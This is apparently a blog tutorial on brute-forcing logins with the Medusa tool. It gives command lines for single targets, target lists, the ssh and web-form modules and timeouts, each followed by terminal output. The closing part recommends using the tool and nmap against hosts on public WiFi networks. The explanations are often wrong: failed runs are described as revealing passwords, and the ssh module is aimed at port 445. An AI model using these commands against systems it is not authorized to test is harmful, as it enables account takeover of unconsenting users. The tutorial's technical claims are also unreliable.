MEDUSA INTRO:- Medusa is used to brute force using the IP address and the hostname. It generally uses the dictionary to attack the IP in the network. If the victim is using the attacker’s network. An attacker can scan the network and determine the IPv4 address to attack, demonstrating ethical hacking consultants.
There are various methods that attackers can use to gather passwords. Medusa offers brute force attacking and user input. In which the attacker can enter the username and password on an assumption basis. An attacker can also use his/her wordlist while brute-forcing.
Most of the time medusa is used to brute force login pages, according to ethical hacking investigators. But today we will test on operating system. To show you we have used Windows 7 for testing or attacking using the wordlist or entering the IPv4 to gather password.
- To use Medusa simply type medusa -h in the Kali Linux terminal.
- The above screenshot shows the Medusa help page in which each module is used in brute-forcing the IP from the text file or by entering IP separately.
- Type medusa -d to see all the modules.
- In the above screenshot is the list of Medusa modules that are used while brute-forcing.
USING THE WORDLIST :-
- Type medusa -h 192.168.1.4 -u A -P /root/Dowloads/wordlist.txt -M SSH -n 445
- -h enter target hostname or IP address
- -u is used to enter the target username for testing.
- -P file containing a password to test. Any wordlist can be used to test.
- -m used to choose any modules that are listed in Medusa.
- -n is used to enter port no. 445
root@kali:~/Downloads# medusa -h 192.168.1.4 -u A -P /root/Downloads/wordlist.txt -M ssh -n 445
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 192.168.1.4 User: A Pass: 123456
^CALERT: Medusa received SIGINT - Sending notification to login threads that we are are aborting.
- Firstly it shows the SSH mod failed because SSH is not open in the target operating system. As the attacker is trying to gain access to the password most of the time Medusa will fail in initializing the modules but will gather the password which is the attacker’s aim.
- After executing the above command, medusa shows the username and the password of the target.
- When we press ctrl + C it closes the scan and shows to abort the medusa command.
- The above information of the target is very sensitive and can be used in other hacking activities.
USING THE TARGET LIST:-
- Type
medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M ssh -n 445
or
Type
medusa -h 192.168.1.4 -U /root/Downloads/target.txt -P /root/Downloads/wordlist.txt -M ssh -n 445
- -H file containing bunch target or IP list on the attacker’s network (/root/Downloads/target.txt contains the list of IP addresses, one IP in each line).
- -u is used to enter the target username for testing.
- -P file containing the password to test. Any wordlist can be used to brute force the target.
- -m is used to select any modules for testing.
- -n is used to enter port no. 445
root@kali:~/Downloads# medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M ssh -n 445
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 192.168.1.4 User: A Pass: 123456
^CALERT: Medusa received SIGINT - Sending notification to login threads that we are are aborting.
- After executing the above command it shows the same output as listed in the above command. The only difference is here attacker adds the target list which contains a bunch of targets that are used in brute-forcing.
- As usual SSH mod failed, because the attacker was targeting an operating system.
- Lastly, Medusa shows that the thread has been stopped.
- The above information of the target is very sensitive and can be used in other hacking activities.
USING DIFFERENT MODULES:-
- Type
medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt-M web-form -n 445
- -H file containing bunch target or IP list on the attacker’s network.
- -u is used to enter the target username for testing.
- -P file containing the password to test. Any wordlist can be used to brute force the target.
- -M is used to select any modules for testing but without the extension.
- -n is used to enter port no. 445
root@kali:~# medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M web-form -n 445 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> ERROR: [web-form.mod] No data received ACCOUNT CHECK: [web-form] Host: 192.168.1.4 (1 of 2, 0 complete) User: A (1 of 1, 0 complete) Password: 123456 (1 of 2 complete)
- After executing the above command medusa shows the username and password on IP 192.168.1.4 using the different module.
- A web form is showing an error because the web form supports get-posts requests. Here modules are compulsory to use in Medusa syntax. If modules are not used it will throw an error.
- The above information of the target is very sensitive and can be used in other hacking activities.
ENTER TIME TO GIVE UP SCAN TO TARGET IP:-
- Type
medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt-M web-form -n 445 -g 2
- -H file containing bunch target or IP list on the attacker’s network.
- -u is used to enter the target username for testing.
- -P file containing the password to test. Any wordlist can be used to brute force the target.
- -M is used to select any modules for testing and here we are using web-form
- -n is used to enter port no. 445
root@kali:~# medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M web-form -n 445 -g 2 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> ERROR: [web-form.mod] No data received ACCOUNT CHECK: [web-form] Host: 192.168.1.4 (1 of 2, 0 complete) User: A (1 of 1, 0 complete) Password: 123456 (1 of 2 complete)
- After executing the above command medusa shows the username and password on IP 192.168.1.4.
- Here medusa shows that after the above given no. of seconds, medusa will stop the scan on the target whether the password is found or not.
- The above information of the target is very sensitive and can be used in other hacking activities.
The Medusa tool can be used to brute force the password of the operating systems as well as login pages. This tool can be used in public WIFI networks. This tool is really fast and quick in cracking passwords other than many tools that ask for hash files of the target operating system. This tool simply tries to attack the IP address and the port number that is available over the network, as per ethical hacking professionals. You can run a nmap scan to check the port numbers of the target IP in public WIFI networks.
Ethical hacking researcher of the International Institute of Cyber Security says that Medusa comes in handy in the initial phase of penetration testing and you can create your wordlist using crunch.
